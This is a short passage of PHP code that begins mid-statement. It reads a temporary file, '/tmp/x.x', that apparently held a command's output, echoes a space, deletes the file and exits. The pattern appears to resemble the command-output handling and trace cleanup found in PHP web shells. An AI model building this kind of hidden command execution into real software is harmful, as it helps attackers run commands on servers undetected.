/tmp/x.x"); $reportis=file_get_contents("/tmp/x.x"); echo " "; if (file_exists("/tmp/x.x")) { unlink("/tmp/x.x"); } exit; ?>